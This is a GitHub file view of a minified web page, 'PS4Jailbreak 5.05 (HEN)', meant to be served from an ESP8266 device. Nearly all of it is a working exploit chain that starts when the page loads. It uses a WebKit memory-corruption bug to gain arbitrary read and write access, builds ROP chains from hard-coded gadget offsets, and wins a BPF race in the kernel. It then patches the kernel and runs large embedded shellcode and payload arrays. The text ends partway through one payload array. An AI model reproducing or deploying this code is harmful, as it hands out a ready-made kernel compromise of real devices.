-
Notifications
You must be signed in to change notification settings - Fork 8
/
index.htm
1 lines (1 loc) · 38.7 KB
/
index.htm
1
<!DOCTYPE html><html><head><title>PS4Jailbreak 5.05 (HEN) for ESP8266</title><meta name=viewport content="width=device-width, initial-scale=1"><style>.loader{position:absolute;left:50%;top:50%;margin:-75px 0 0 -75px;border:10px solid #f3f3f3;border-radius:50%;border-top:10px solid #044595;border-left:10px solid #044595;width:120px;height:120px;-webkit-animation:spin 1s linear infinite}.info{overflow:hidden;position:fixed;position:absolute;top:50%;left:50%;font-size:45px;font-family:sans-serif;transform:translate(-50%,-50%)}.credits{overflow:hidden;position:fixed;position:absolute;top:90%;left:50%;font-size:16px;font-family:sans-serif;text-align:center;transform:translate(-50%,-90%)}@-webkit-keyframes spin{0%{-webkit-transform:rotate(0deg)}100%{-webkit-transform:rotate(360deg)}}</style></head><body style=margin:0><div id=loader class=loader></div><div id=done class=info style=display:none>Done.</div><div id=fail class=info style=display:none>Fail!</div><div id=footer class=credits><ul style=list-style:none;padding-left:0><li><a href=#>qwertyoruiopz</a></li><li><a href=#>flatz</a></li><li><a href=#>specter</a></li><li><a href=#>xvortex</a></li><li><a href=#>SiSTRo</a></li><li>anonymous contributors</li></ul></div><script>var p;var s={};var g={};var gc={"pop_r8":96709,"pop_r9":12268047,"pop_rax":17397,"pop_rcx":339545,"pop_rdx":1826852,"pop_rsi":586634,"pop_rdi":232890,"pop_rsp":124551,"jmp_rax":130,"jmp_rdi":2711166,"mov_rdx_rax":3488561,"mov_rdi_rax":22692143,"mov_rax_rdx":1896224,"mov_rbp_rsp":985418,"mov__rdi__rax":3857131,"mov__rdi__rsi":146114,"mov__rax__rsi":2451047,"mov_rax__rax__":444474,"mov_rax__rdi__":290553,"add_rax_rsi":1384646,"and_rax_rsi":22481823,"add_rdi_rax":5593055,"jop":800720,"ret":60,"stack_chk_fail":200,"setjmp":5368};window.onload=function(){setTimeout(exploit,3000);};window.onerror=function(e){document.getElementById("loader").style.display="none";document.getElementById("fail").style.display="block";if(e.startsWith("Error:")==true){alert(e);}else{location.reload();};};function done(){document.getElementById("loader").style.display="none";document.getElementById("done").style.display="block";};var rop=function(){this.stack=new Uint32Array(65536);this.stackBase=p.read8(p.leakval(this.stack).add32(16));this.count=0;this.clear=function(){this.count=0;this.runtime=undefined;for(var i=0;i<4080/2;i++){p.write8(this.stackBase.add32(i*8),0);};};this.pushSymbolic=function(){this.count++;return this.count-1;};this.finalizeSymbolic=function(idx,val){p.write8(this.stackBase.add32(idx*8),val);};this.push=function(val){this.finalizeSymbolic(this.pushSymbolic(),val);};this.push_write8=function(where,what){this.push(g.pop_rdi);this.push(where);this.push(g.pop_rsi);this.push(what);this.push(g.mov__rdi__rsi);};this.fcall=function(rip,rdi,rsi,rdx,rcx,r8,r9){if(rdi!=undefined){this.push(g.pop_rdi);this.push(rdi);};if(rsi!=undefined){this.push(g.pop_rsi);this.push(rsi);};if(rdx!=undefined){this.push(g.pop_rdx);this.push(rdx);};if(rcx!=undefined){this.push(g.pop_rcx);this.push(rcx);};if(r8!=undefined){this.push(g.pop_r8);this.push(r8);};if(r9!=undefined){this.push(g.pop_r9);this.push(r9);};this.push(rip);return this;};this.run=function(){var retv=p.loadchain(this,this.notimes);this.clear();return retv;};return this;};function makeid(){var text="";var possible="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";for(var i=0;i<8;i++){text+=possible.charAt(Math.floor(Math.random()*possible.length));};return text;};var instancespr=[];for(var i=0;i<4096;i++){instancespr[i]=new Uint32Array(1);instancespr[i][makeid()]=50057;};var _dview;function u2d(low,hi){if(!_dview)_dview=new DataView(new ArrayBuffer(16));_dview.setUint32(0,hi);_dview.setUint32(4,low);return _dview.getFloat64(0);};function zeroFill(number,width){width-=number.toString().length;if(width>0){return new Array(width+(/\./.test(number)?2:1)).join("0")+number;};return number+"";};function int64(low,hi){this.low=(low>>>0);this.hi=(hi>>>0);this.add32=function(val){var new_lo=(((this.low>>>0)+val)&4294967295)>>>0;var new_hi=(this.hi>>>0);if(new_lo<this.low){new_hi++;};return new int64(new_lo,new_hi);};this.add32inplace=function(val){var new_lo=(((this.low>>>0)+val)&4294967295)>>>0;var new_hi=(this.hi>>>0);if(new_lo<this.low){new_hi++;};this.hi=new_hi;this.low=new_lo;};this.sub32=function(val){var new_lo=(((this.low>>>0)-val)&4294967295)>>>0;var new_hi=(this.hi>>>0);if(new_lo>(this.low)&4294967295){new_hi--;};return new int64(new_lo,new_hi);};this.sub32inplace=function(val){var new_lo=(((this.low>>>0)-val)&4294967295)>>>0;var new_hi=(this.hi>>>0);if(new_lo>(this.low)&4294967295){new_hi--;};this.hi=new_hi;this.low=new_lo;};this.toString=function(val){val=16;var lo_str=(this.low>>>0).toString(val);var hi_str=(this.hi>>>0).toString(val);if(this.hi==0)return lo_str;else{lo_str=zeroFill(lo_str,8);};return hi_str+lo_str;};return this;};var nogc=[];var tgt={a:0,b:0,c:0,d:0};var y=new ImageData(1,16384);postMessage("","*",[y.data.buffer]);var props={};for(var i=0;i<16384/2;){props[i++]={value:1111638594};props[i++]={value:tgt};};var foundLeak=undefined;var foundIndex=0;var maxCount=256;while(foundLeak==undefined&&maxCount>0){maxCount--;history.pushState(y,"");Object.defineProperties({},props);var leak=new Uint32Array(history.state.data.buffer);for(var i=0;i<leak.length-6;i++){if(leak[i]==1111638594&&leak[i+1]==4294901760&&leak[i+2]==0&&leak[i+3]==0&&leak[i+4]==0&&leak[i+5]==0&&leak[i+6]==14&&leak[i+7]==0&&leak[i+10]==0&&leak[i+11]==0&&leak[i+12]==0&&leak[i+13]==0&&leak[i+14]==14&&leak[i+15]==0){foundIndex=i;foundLeak=leak;break;};};};if(!foundLeak){throw new Error("infoleak fail");};Array.prototype.__defineGetter__(100,()=>1);var firstLeak=Array.prototype.slice.call(foundLeak,foundIndex,foundIndex+64);var leakJSVal=new int64(firstLeak[8],firstLeak[9]);var f=document.body.appendChild(document.createElement("iframe"));var a=new f.contentWindow.Array(13.37,13.37);var b=new f.contentWindow.Array(u2d(leakJSVal.low+16,leakJSVal.hi),13.37);var master=new Uint32Array(4096);var slave=new Uint32Array(4096);var leakval_u32=new Uint32Array(4096);var leakval_helper=[slave,2,3,4,5,6,7,8,9,10];tgt.a=u2d(2048,23077632);tgt.b=0;tgt.c=leakval_helper;tgt.d=4919;var c=Array.prototype.concat.call(a,b);document.body.removeChild(f);var hax=c[0];c[0]=0;tgt.c=c;hax[2]=0;hax[3]=0;Object.defineProperty(Array.prototype,100,{get:undefined});tgt.c=leakval_helper;var butterfly=new int64(hax[2],hax[3]);butterfly.low+=16;tgt.c=leakval_u32;var lkv_u32_old=new int64(hax[4],hax[5]);hax[4]=butterfly.low;hax[5]=butterfly.hi;tgt.c=master;hax[4]=leakval_u32[0];hax[5]=leakval_u32[1];var a2sb=new int64(master[4],master[5]);tgt.c=leakval_u32;hax[4]=lkv_u32_old.low;hax[5]=lkv_u32_old.hi;tgt.c=0;hax=0;var p={write8:function(addr,val){master[4]=addr.low;master[5]=addr.hi;if(val instanceof int64){slave[0]=val.low;slave[1]=val.hi;}else{slave[0]=val;slave[1]=0;};master[4]=a2sb.low;master[5]=a2sb.hi;},write4:function(addr,val){master[4]=addr.low;master[5]=addr.hi;slave[0]=val;master[4]=a2sb.low;master[5]=a2sb.hi;},read8:function(addr){master[4]=addr.low;master[5]=addr.hi;var rtv=new int64(slave[0],slave[1]);master[4]=a2sb.low;master[5]=a2sb.hi;return rtv;},read4:function(addr){master[4]=addr.low;master[5]=addr.hi;var rtv=slave[0];master[4]=a2sb.low;master[5]=a2sb.hi;return rtv;},leakval:function(jsval){leakval_helper[0]=jsval;var rtv=this.read8(butterfly);this.write8(butterfly,new int64(1094795585,4294901760));return rtv;}};var get_jmptgt=function(addr){var z=p.read4(addr)&65535;var y=p.read4(addr.add32(2));if(z!=9727)return 0;return addr.add32(y+6);};var exploit=function(){p.leakfunc=function(func){var fptr_store=p.leakval(func);return(p.read8(fptr_store.add32(24))).add32(64);};var parseFloatStore=p.leakfunc(parseFloat);var webKitBase=p.read8(parseFloatStore);webKitBase.low&=4294963200;webKitBase.sub32inplace(5881856-147456);var o2wk=function(o){return webKitBase.add32(o);};for(var gn in gc){if(gc.hasOwnProperty(gn)){g[gn]=o2wk(gc[gn]);};};var libKernelBase=p.read8(get_jmptgt(g.stack_chk_fail));libKernelBase.low&=4294963200;libKernelBase.sub32inplace(53248+16384);var wkview=new Uint8Array(4096);var wkstr=p.leakval(wkview).add32(16);p.write8(wkstr,webKitBase);p.write4(wkstr.add32(8),57131008);var hold1;var hold2;var holdz;var holdz1;while(1){hold1={a:0,b:0,c:0,d:0};hold2={a:0,b:0,c:0,d:0};holdz1=p.leakval(hold2);holdz=p.leakval(hold1);if(holdz.low-48==holdz1.low)break;};var pushframe=[];pushframe.length=128;var funcbuf;var funcbuf32=new Uint32Array(256);nogc.push(funcbuf32);var launch_chain=function(chain){var stackPointer=0;var stackCookie=0;var orig_reenter_rip=0;var reenter_help={length:{valueOf:function(){orig_reenter_rip=p.read8(stackPointer);stackCookie=p.read8(stackPointer.add32(8));var returnToFrame=stackPointer;var ocnt=chain.count;chain.push_write8(stackPointer,orig_reenter_rip);chain.push_write8(stackPointer.add32(8),stackCookie);if(chain.runtime)returnToFrame=chain.runtime(stackPointer);chain.push(g.pop_rsp);chain.push(returnToFrame);chain.count=ocnt;p.write8(stackPointer,(g.pop_rsp));p.write8(stackPointer.add32(8),chain.stackBase);}}};funcbuf=p.read8(p.leakval(funcbuf32).add32(16));p.write8(funcbuf.add32(48),g.setjmp);p.write8(funcbuf.add32(128),g.jop);p.write8(funcbuf,funcbuf);p.write8(parseFloatStore,g.jop);var orig_hold=p.read8(holdz1);var orig_hold48=p.read8(holdz1.add32(72));p.write8(holdz1,funcbuf.add32(80));p.write8(holdz1.add32(72),funcbuf);parseFloat(hold2,hold2,hold2,hold2,hold2,hold2);p.write8(holdz1,orig_hold);p.write8(holdz1.add32(72),orig_hold48);stackPointer=p.read8(funcbuf.add32(16));rtv=Array.prototype.splice.apply(reenter_help);return p.leakval(rtv);};p.loadchain=launch_chain;var kview=new Uint8Array(4096);var kstr=p.leakval(kview).add32(16);p.write8(kstr,libKernelBase);p.write4(kstr.add32(8),262144);var countbytes;for(var i=0;i<262144;i++){if(kview[i]==114&&kview[i+1]==100&&kview[i+2]==108&&kview[i+3]==111&&kview[i+4]==99){countbytes=i;break;};};p.write4(kstr.add32(8),countbytes+32);var dview32=new Uint32Array(1);var dview8=new Uint8Array(dview32.buffer);for(var i=0;i<countbytes;i++){if(kview[i]==72&&kview[i+1]==199&&kview[i+2]==192&&kview[i+7]==73&&kview[i+8]==137&&kview[i+9]==202&&kview[i+10]==15&&kview[i+11]==5){dview8[0]=kview[i+3];dview8[1]=kview[i+4];dview8[2]=kview[i+5];dview8[3]=kview[i+6];var syscallno=dview32[0];s[syscallno]=libKernelBase.add32(i);};};var chain=new rop();var returnvalue;p.fcall_=function(rip,rdi,rsi,rdx,rcx,r8,r9){chain.clear();chain.notimes=this.next_notime;this.next_notime=1;chain.fcall(rip,rdi,rsi,rdx,rcx,r8,r9);chain.push(g.pop_rdi);chain.push(chain.stackBase.add32(16376));chain.push(g.mov__rdi__rax);chain.push(g.pop_rax);chain.push(p.leakval(1094795842));if(chain.run().low!=1094795842){throw new Error("unexpected rop behaviour");};returnvalue=p.read8(chain.stackBase.add32(16376));};p.fcall=function(){p.fcall_.apply(this,arguments);return returnvalue;};p.readstr=function(addr){var addr_=addr.add32(0);var rd=p.read4(addr_);var buf="";while(rd&255){buf+=String.fromCharCode(rd&255);addr_.add32inplace(1);rd=p.read4(addr_);};return buf;};p.syscall=function(sysc,rdi,rsi,rdx,rcx,r8,r9){if(typeof sysc!="number"){throw new Error("invalid syscall");};var off=s[sysc];if(off==undefined){throw new Error("invalid syscall");};return p.fcall(off,rdi,rsi,rdx,rcx,r8,r9);};p.sptr=function(str){var bufView=new Uint8Array(str.length+1);for(var i=0;i<str.length;i++){bufView[i]=str.charCodeAt(i)&255;};nogc.push(bufView);return p.read8(p.leakval(bufView).add32(16));};p.malloc=function(sz){var backing=new Uint8Array(65536+sz);nogc.push(backing);var ptr=p.read8(p.leakval(backing).add32(16));ptr.backing=backing;return ptr;};p.malloc32=function(sz){var backing=new Uint8Array(65536+sz*4);nogc.push(backing);var ptr=p.read8(p.leakval(backing).add32(16));ptr.backing=new Uint32Array(backing.buffer);return ptr;};var test=p.syscall(23,0);if(test!="0"){var fd=p.syscall(5,p.sptr("/dev/bpf0"),2).low;var fd1=p.syscall(5,p.sptr("/dev/bpf0"),2).low;if(fd==(-1>>>0)){throw new Error("open bpf fail");};var bpf_valid=p.malloc32(16384);var bpf_spray=p.malloc32(16384);var bpf_valid_u32=bpf_valid.backing;var bpf_valid_prog=p.malloc(64);p.write8(bpf_valid_prog,2048/8);p.write8(bpf_valid_prog.add32(8),bpf_valid);var bpf_spray_prog=p.malloc(64);p.write8(bpf_spray_prog,2048/8);p.write8(bpf_spray_prog.add32(8),bpf_spray);for(var i=0;i<1024;){bpf_valid_u32[i++]=6;bpf_valid_u32[i++]=0;};var rtv=p.syscall(54,fd,2148549243,bpf_valid_prog);if(rtv.low!=0){throw new Error("ioctl bpf fail");};var spawnthread=function(name,chain){var longjmp=webKitBase.add32(5352);var createThread=webKitBase.add32(7836560);var contextp=p.malloc32(8192);var contextz=contextp.backing;contextz[0]=1337;var thread2=new rop();thread2.push(g.ret);thread2.push(g.ret);thread2.push(g.ret);thread2.push(g.ret);chain(thread2);p.write8(contextp,g.ret);p.write8(contextp.add32(16),thread2.stackBase);p.syscall(324,1);var retv=function(){p.fcall(createThread,longjmp,contextp,p.sptr(name));};nogc.push(contextp);nogc.push(thread2);return retv;};var interrupt1,loop1;var sock=p.syscall(97,2,2);var kscratch=p.malloc32(4096);var start1=spawnthread("GottaGoFast",function(thread2){interrupt1=thread2.stackBase;thread2.push(g.ret);thread2.push(g.ret);thread2.push(g.ret);thread2.push(g.pop_rdi);thread2.push(fd);thread2.push(g.pop_rsi);thread2.push(2148549243);thread2.push(g.pop_rdx);thread2.push(bpf_valid_prog);thread2.push(g.pop_rsp);thread2.push(thread2.stackBase.add32(2048));thread2.count=256;var cntr=thread2.count;thread2.push(s[54]);thread2.push_write8(thread2.stackBase.add32(cntr*8),s[54]);thread2.push(g.pop_rdi);var wherep=thread2.pushSymbolic();thread2.push(g.pop_rsi);var whatp=thread2.pushSymbolic();thread2.push(g.mov__rdi__rsi);thread2.push(g.pop_rsp);loop1=thread2.stackBase.add32(thread2.count*8);thread2.push(1094795585);thread2.finalizeSymbolic(wherep,loop1);thread2.finalizeSymbolic(whatp,loop1.sub32(8));});var krop=new rop();var race=new rop();var ctxp=p.malloc32(8192);var ctxp1=p.malloc32(8192);var ctxp2=p.malloc32(8192);p.write8(bpf_spray.add32(16),ctxp);p.write8(ctxp.add32(80),0);p.write8(ctxp.add32(104),ctxp1);var stackshift_from_retaddr=0;p.write8(ctxp1.add32(16),o2wk(19536333));stackshift_from_retaddr+=8+88;p.write8(ctxp.add32(0),ctxp2);p.write8(ctxp.add32(16),ctxp2.add32(8));p.write8(ctxp2.add32(2000),o2wk(7271653));var iterbase=ctxp2;for(var i=0;i<15;i++){p.write8(iterbase,o2wk(19536333));stackshift_from_retaddr+=8+88;p.write8(iterbase.add32(2000+32),o2wk(7271653));p.write8(iterbase.add32(8),iterbase.add32(32));p.write8(iterbase.add32(24),iterbase.add32(32+8));iterbase=iterbase.add32(32);};var raxbase=iterbase;var rdibase=iterbase.add32(8);var memcpy=get_jmptgt(webKitBase.add32(248));memcpy=p.read8(memcpy);p.write8(raxbase,o2wk(22848539));stackshift_from_retaddr+=8;p.write8(rdibase.add32(112),o2wk(19417140));stackshift_from_retaddr+=8;p.write8(rdibase.add32(24),rdibase);p.write8(rdibase.add32(8),krop.stackBase);p.write8(raxbase.add32(48),g.mov_rbp_rsp);p.write8(rdibase,raxbase);p.write8(raxbase.add32(1056),o2wk(2566497));p.write8(raxbase.add32(64),memcpy.add32(194-144));var topofchain=stackshift_from_retaddr+40;p.write8(rdibase.add32(176),topofchain);for(var i=0;i<4096/8;i++){p.write8(krop.stackBase.add32(i*8),g.ret);};krop.count=16;var kpatch=function(offset,qword){krop.push(g.pop_rax);krop.push(kscratch);krop.push(g.mov_rax__rax__);krop.push(g.pop_rsi);krop.push(offset);krop.push(g.add_rax_rsi);krop.push(g.pop_rsi);krop.push(qword);krop.push(g.mov__rax__rsi);};var kpatch2=function(offset,offset2){krop.push(g.pop_rax);krop.push(kscratch);krop.push(g.mov_rax__rax__);krop.push(g.pop_rsi);krop.push(offset);krop.push(g.add_rax_rsi);krop.push(g.mov_rdi_rax);krop.push(g.pop_rax);krop.push(kscratch);krop.push(g.mov_rax__rax__);krop.push(g.pop_rsi);krop.push(offset2);krop.push(g.add_rax_rsi);krop.push(g.mov__rdi__rax);};p.write8(kscratch.add32(1056),g.pop_rdi);p.write8(kscratch.add32(64),g.pop_rax);p.write8(kscratch.add32(24),kscratch);krop.push(g.pop_rdi);krop.push(kscratch.add32(24));krop.push(g.mov_rbp_rsp);var rboff=topofchain-krop.count*8+40;krop.push(o2wk(2566497));krop.push(g.pop_rax);krop.push(rboff);krop.push(g.add_rdi_rax);krop.push(g.mov_rax__rdi__);krop.push(g.pop_rsi);krop.push(762);krop.push(g.add_rax_rsi);krop.push(g.mov__rdi__rax);var shellbuf=p.malloc32(4096);krop.push(g.pop_rdi);krop.push(kscratch);krop.push(g.mov__rdi__rax);krop.push(g.pop_rsi);krop.push(808116);krop.push(g.add_rax_rsi);krop.push(g.pop_rdi);krop.push(kscratch.add32(8));krop.push(g.mov__rdi__rax);krop.push(g.jmp_rax);krop.push(g.pop_rdi);krop.push(kscratch.add32(16));krop.push(g.mov__rdi__rax);krop.push(g.pop_rsi);krop.push(new int64(4294901759,4294967295));krop.push(g.and_rax_rsi);krop.push(g.mov_rdx_rax);krop.push(g.pop_rax);krop.push(kscratch.add32(8));krop.push(g.mov_rax__rax__);krop.push(g.pop_rsi);krop.push(9);krop.push(g.add_rax_rsi);krop.push(g.mov_rdi_rax);krop.push(g.mov_rax_rdx);krop.push(g.jmp_rdi);krop.push(g.pop_rax);krop.push(kscratch);krop.push(g.mov_rax__rax__);krop.push(g.pop_rsi);krop.push(221338);krop.push(g.add_rax_rsi);krop.push(g.mov_rax__rax__);krop.push(g.pop_rdi);krop.push(kscratch.add32(816));krop.push(g.mov__rdi__rax);kpatch(221338,new int64(2425420344,2425393296));kpatch(20169540,shellbuf);kpatch(new int64(4293816070,4294967295),new int64(184,3297329408));kpatch(new int64(4293470503,4294967295),new int64(0,1082624841));kpatch(new int64(4293470533,4294967295),new int64(2425388523,1922076816));kpatch(new int64(4294769332,4294967295),new int64(934690871,826654769));kpatch(828366,new int64(115177,2336788480));kpatch(1329844,new int64(2428747825,2425393296));kpatch(new int64(15789236,0),new int64(2,0));kpatch2(new int64(15789244,0),new int64(4293548276,4294967295));kpatch(new int64(15789276,0),new int64(0,1));krop.push(g.pop_rax);krop.push(kscratch.add32(8));krop.push(g.mov_rax__rax__);krop.push(g.pop_rsi);krop.push(9);krop.push(g.add_rax_rsi);krop.push(g.mov_rdi_rax);krop.push(g.pop_rax);krop.push(kscratch.add32(16));krop.push(g.mov_rax__rax__);krop.push(g.jmp_rdi);krop.push(o2wk(380345));krop.push(kscratch.add32(4096));var kq=p.malloc32(16);var kev=p.malloc32(256);kev.backing[0]=sock;kev.backing[2]=131071;kev.backing[3]=1;kev.backing[4]=5;var shcode=[35817,2425393152,2425393296,2425393296,8567125,2303246336,1096172005,1398030677,2303275535,3149957588,256,551862601,1220806985,9831821,2370371584,4265616532,2370699263,3767542964,2370633744,1585456300,2169045059,1265721540,277432321,4202255,698,3867757568,524479,3607052544,960335176,1207959552,3224487561,2211839809,3698655723,1103114587,1096630620,2428722526,1032669269,4294967160,2303260209,15293925,1207959552,770247,2303262720,3271888842,1818324331,979595116,628633632,1815490864,2648,0,0,0,0,0,0,0,0,0,0,0,0,0,0];for(var i=0;i<shcode.length;i++){shellbuf.backing[i]=shcode[i];};start1();while(1){race.count=0;race.push(s[362]);race.push(g.pop_rdi);race.push(kq);race.push(g.mov__rdi__rax);race.push(g.ret);race.push(g.ret);race.push(g.ret);race.push(g.ret);race.push_write8(loop1,interrupt1);race.push(g.pop_rdi);race.push(fd);race.push(g.pop_rsi);race.push(2148549243);race.push(g.pop_rdx);race.push(bpf_valid_prog);race.push(s[54]);race.push(g.pop_rax);race.push(kq);race.push(g.mov_rax__rax__);race.push(g.mov_rdi_rax);race.push(g.pop_rsi);race.push(kev);race.push(g.pop_rdx);race.push(1);race.push(g.pop_rcx);race.push(0);race.push(g.pop_r8);race.push(0);race.push(s[363]);race.push(g.pop_rdi);race.push(fd1);race.push(g.pop_rsi);race.push(2148549243);race.push(g.pop_rdx);race.push(bpf_spray_prog);race.push(s[54]);race.push(g.pop_rax);race.push(kq);race.push(g.mov_rax__rax__);race.push(g.mov_rdi_rax);race.push(s[6]);race.run();if(kscratch.backing[0]!=0){p.syscall(74,shellbuf,16384,7);p.fcall(shellbuf);break;};};};var createThread=webKitBase.add32(7836560);var payloadbuf=p.malloc32(16384);var payload=[139241,3224455168,264931657,3271651845,1211990856,31,4283439220,2047765,143218944,4290824008,1224736767,4294951623,1405353983,1224378696,33614977,2370306048,1957685,3884533760,369082417,7976,3219556680,129,519706111,2168979456,131268,1103321856,1096171863,1431585109,3968026707,8567064,839892992,1221691720,1208505995,1210114497,2370357257,749973656,847989762,610044232,1653296136,4135931144,23888911,2202599424,2249132028,354,1084788040,1291845630,785430669,2370306094,3052236952,1488472064,1280262468,1229996377,2232354361,314,138906440,1213238088,1077971784,411601736,3338665985,1088,1086783488,8,339789568,0,455,2336751616,159817869,1216956417,2240497712,36444784,541231432,407013704,814189384,1207959553,5055,16777216,1086801976,4294967136,2022263039,1086802008,4294967144,537870847,3901312197,4294911304,571473918,3921168576,449,3347794064,1334855813,0,1552271104,20385,822083584,8767478,822110759,1217446848,2244468617,6599344,2428699056,4194490,3498428160,2952815794,1217446657,2134541705,2244411427,21652464,117571584,498996735,2303459328,4136193250,4292839752,1937173,3565536768,3942657584,596938058,16383,1222543688,136608907,14844232,1224736704,3221284481,129630207,1090519040,2244401151,3027156,571425141,1577273797,3296937992,1220555032,1566300809,1564564545,1598119489,2202591999,3364034756,1096637439,1096630620,3277799774,3968026707,15067152,1592262656,1207959553,31851917,2303197184,93004804,7132,608471368,4290785544,1904405,3867756544,205360456,3355443198,0,7333888,3229941760,175424393,369082417,7404,2370312331,1814845,4712448,2370306048,1817405,3926016,4290641920,1207959553,462699917,1122500608,3187671040,511,2570947912,3892314139,49,80104,1032669184,7079,4294800104,3296938239,1540917520,3234285763,10,4294783977,3234285823,11,4294780905,3234285823,136,4294777833,3234285823,591,4294774761,4052306175,1221734736,826670729,38977472,3224436736,4294767848,1405311743,1631423816,1207959579,1209068675,473302471,0,2370306048,1208755292,3270041225,2248146943,1210217664,2370363017,1787453,4289718272,3230007295,2303201140,1032669406,6982,4294941928,612142079,361580556,7160,1110805832,3892314139,4294967161,203717771,3910503752,1207959579,456340877,1659371520,1224736767,1527825539,826627011,3224454601,3526478129,2370369073,1781053,3172335360,1207959579,465442189,2370306048,1782069,2311293184,4281067719,3750363135,2232782152,1207959579,455030157,384303104,2315255807,2370329567,1808149,898451456,6928,4294901993,1355362815,4130460209,87919944,1157627931,826657073,1628831680,1493172251,1226149192,1207959579,454047117,3347644416,4294889705,255,1329677400,1346459980,3816,0,1946697603,1025900294,2332033050,3246987335,1964566977,2177010160,201326818,16417024,1962937344,947880416,4919,4280670069,2315254783,3224442951,1220643144,354227597,4148690944,286558937,940004488,1220607816,1964046467,1101982691,1096171863,1431585109,3968026707,4253632808,1106676041,2303317897,2336777676,9516,2370306048,3121357916,20,836733256,2031484918,1140850714,203717769,75205960,3136719180,16,443160063,2336751616,1700661,4018751488,369087025,6760,1223264588,2303516297,548946407,3120562176,20,428742143,2336751616,1689397,4018751488,439752191,2202533888,1566255300,1564564545,1598119489,1096237507,1096106326,1213420884,29420673,2303262720,612666365,536,611617096,3029025800,135204,3548989440,2337685840,35136644,4283432960,35136692,3036610560,137252,1955284992,369045540,6400,818185032,2302787717,3934523332,1157627906,2232415877,737,611093832,1224093984,280686473,1275068416,807695501,612142412,2434137936,1207959577,539253897,3343447601,2630724,1275068417,280688521,4278190080,1667861,1150110720,2303488036,1211114620,941900999,32,18618,1291202816,2303510409,4278723652,1657621,93145088,5548,612665672,144,486903112,1207959573,2552530057,1207959552,344851853,2303197184,10495108,2370306048,1310469,2223589376,43044,93145088,4976,612665672,176,478890085,37,898320384,6280,2303250993,4246077407,1275068440,136594571,1224182092,2303520393,823525314,1207959576,409089419,2303197184,3330884063,416159231,2235891712,3867480054,1207959553,409877899,2370568192,12068020,3375431680,4130460209,416945663,4130406400,31930,4152970240,611093832,2232811328,1207959576,4028925067,1291845633,1275352717,29020553,1275068416,2303524745,1209017428,225285,2227660288,47140,1209218816,2303248009,1711809604,3122955463,536870912,4254197760,2336817151,1561397,1221734656,369090441,6216,280688177,1207959552,369094537,6176,609520460,2144784,2303262720,2159559145,1207959552,307105165,2303459328,3616099542,390731263,2336751616,1542965,3750316032,270812297,402003455,1418395648,3531935780,15500559,2370306048,20194436,4130406400,31930,3347662848,608471368,3172335376,1207959575,270812299,698,1955284992,2303461412,2227660543,78884,1712535296,908362951,536870913,1351437312,3515436036,609519948,4241877016,2336817151,1513269,1221734656,369090441,6028,2303260209,1096431,369033216,5988,609520460,3918088472,8435777,2370306048,1152781,2144768,2303459328,3616099542,378410495,2336751616,1494837,3750316032,369083785,5948,980807045,1290701132,369096585,5700,108314757,8227649,2336758251,2336760884,4279247996,1452821,1958774016,76236832,2201520932,108331007,370021887,2336751616,1484605,420871936,3942645783,1032538128,5784,4293144901,1509141,3296806912,440,1541441860,1096565085,1096696157,3224486751,1962902856,93014037,5748,1207995208,108314757,544750408,1103360629,4283651412,1495829,3297329408,1090882376,1207959574,2236098699,2340386029,4169336901,1211593983,371332491,2336751616,3682945050,54208628,2336754038,37019,1945037568,2609596425,136,3782599659,293763,2170947700,322373755,2336753268,3068858477,175866726,1223914784,366361995,2370306048,549063795,4278190080,1451797,93014016,5560,139704079,175355663,1207979403,369047691,5428,2302984427,1096637408,1398129500,418153288,612141384,2336777480,9516,2336751616,1406773,1221734656,369094537,5612,608996172,2159558920,1207959552,270142861,2428108800,1224736768,1209039245,369098377,5368,1094028104,1207959573,3230003081,632865673,260050698,369088581,5540,415531848,1566300297,1096106435,2303219028,1213289469,822640523,4273793243,2236153855,1208251584,1209030795,369094537,5244,2302787717,2198238660,1946158205,3682945102,2204518772,1963085947,2878164034,608,3908012364,4294967106,796246149,41146,4001975296,1172277576,369091633,5420,2696645960,3120562176,864,369096241,5392,280007,1509949440,1541441860,1096565085,1398129501,1375570248,142576456,870898481,1224736766,74760325,274238280,4293888328,1307413,1975551232,75334406,1209758720,376757125,33569665,242548736,612076872,4294885864,71666175,1532674097,2193212253,264241152,3515435058,551665992,264767816,2303247904,3800123634,4294901759,2629968399,2370370143,4294936853,2290960639,4294966848,3341150849,3391684708,3311505545,2370306148,4294893589,82477567,687891669,1083214282,1207985363,4182644109,3934388223,6439018,2424949289,6438566,2752875848,2181038077,1659466474,2311727360,1659350672,361580544,4294965781,646090052,2181010773,1789725162,3358146816,2302986793,1789466240,1167100160,1459645099,3324120989,1220555203,359989125,3238366024,1207959571,2236088459,1208382656,1965062203,2236138482,1213421055,1951595401,898451495,4288,334632447,2236088320,3314108608,2370310772,1092413,3038117632,1207959571,351373,3750316120,637492571,4924,1222324563,1209068675,594870149,1963081603,1955416094,369035300,4872,259375237,608471880,1222324488,17332355,1220776975,2299577475,1103322072,1096171863,1431585109,3968026707,4270410024,612142408,3373661976,1090519058,1946238595,4152970269,4294942696,1975551487,4152970257,312874495,2302738432,11397568,2336292864,45746246,1275068416,318647691,2336751616,1244981,1049314560,136594569,1706495813,3071230220,21040709,3965929924,4293888328,1257237,213401856,1207959552,2303246469,1231582403,1211659915,2303257225,3910533087,1224736786,1211661963,2303519369,3642097646,1090519058,132807,2303459328,1720272375,622198536,1224736786,1211661963,2303257225,608471518,2971008780,2332033042,1158161476,2336767625,1211189,3750316032,138840385,313923071,2336489472,1208755268,1529398403,1572899140,1564564545,1598119489,1431585219,4253632595,2699854152,2197815296,2303263039,1208776140,1031075461,1977910605,2302077740,1208755284,3894686857,4294966940,607423304,1418444933,3681881124,1222740300,369094537,4528,79849,4018751488,4294866920,1975551487,1489674,4041801728,1207959552,270824589,4293888328,1146645,2311095552,3632598979,2332033024,4169334853,1208972545,1211651467,2215629445,175,4169362411,3162836738,1207959552,255358347,252464823,1209550519,1222660493,1208344769,2202583593,2249146362,162,252699264,39301,1418545152,2236096518,259028178,1208895159,99469,1224736767,2169030145,34878,1209431296,1208534659,405044365,35002,2232811264,3942645777,272796461,4261428582,2370322549,3122144380,136,154504520,4278190095,1139477,1149978624,2336755748,1149847552,2370312228,3122144372,136,4293364044,1131285,3138710272,3,494341611,49840998,767277172,2298478592,3140348888,4294967261,3686528491,3959422975,272459502,1721464062,1979586621,2089634013,2293897252,1207959552,234763661,2481651712,2697232712,1526726656,3277603165,3850979413,3968026707,1166755864,4220078080,4168649544,1962902856,1435060249,1971931360,4246137064,2336817151,3230001269,3763702600,2202537845,2303203524,4284308447,1060645,71485184,0,415531848,1566294065,2303219139,1096237541,1096106326,2202555220,2336762092,2303262789,1720405247,4085860360,1483639628,1